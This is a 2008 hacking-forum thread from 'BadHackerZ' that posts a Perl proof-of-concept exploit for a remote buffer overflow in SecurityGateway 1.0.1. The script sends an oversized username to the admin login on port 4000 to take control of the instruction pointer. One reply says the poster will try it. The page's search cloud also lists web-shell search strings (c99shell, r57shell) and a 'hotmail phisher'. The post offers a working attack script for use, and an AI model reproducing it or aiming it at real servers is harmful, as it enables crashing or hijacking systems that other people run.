BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes
Reload this Page SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC
Register FAQ Members List Calendar Arcade Mark Forums Read

Notices
Welcome to the BadHackerz forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact contact us.

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 06-02-2008   #1 (permalink)
Studentz
 
Armageddon's Avatar
 
Join Date: Jun 2006

Location: On port u forgot to secure!
Age: 18
Posts: 6,125
Thanks: 57
Thanked 171 Times in 126 Posts
Rep Power: 250 Armageddon has a reputation beyond repute
Armageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to Armageddon
Default SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC
Code:
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned  when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#63636363 ??              ???
#
# Replace http://127.0.0.1:4000/ with your remote host.

use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my $payload2 ="b" x 480;
my $eip_owned = "c" x 4;

print "SecurityGateway Remote BoF exploit by securfrog.\n\n";
my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll');
$req->content_type('application/x-www-form-urlencoded');
$req->content('RequestedPage=login&username='.$payload2.$eip_owned.$payload1.'&passwd=world&lang=en&logon=Sign+In');
my $res = $connect->request($req);
print $res->as_string;
print "Exploit successfull\n";
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Armageddon is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Old 06-10-2008   #2 (permalink)
Leecher
 
Join Date: May 2008

Posts: 14
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 24 karanjohar1 is on a distinguished road
Default
nice.
i will try it and reply u

anyway nice post

thanks
karanjohar1 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks

« Previous Thread | Next Thread »


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Alt-N SecurityGateway Username Buffer Overflow (Exploit) Armageddon Exploit Codes 0 08-02-2008 12:21 PM
SecurityGateway 1.0.1 Remote Buffer Overflow UnknownBug Exploit Codes 1 06-10-2008 01:45 AM
Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit ThE KinG Exploit Codes 0 06-06-2008 03:54 PM
ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Intruder Exploit Codes 0 06-01-2008 01:15 PM
SMS/MMS Gateway v5.5 Remote Buffer Overflow Intruder Exploit Codes 0 06-01-2008 01:12 PM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag tamil sex stories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 10:14 AM.

Contact Us - Archive - Privacy Statement - Top

Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios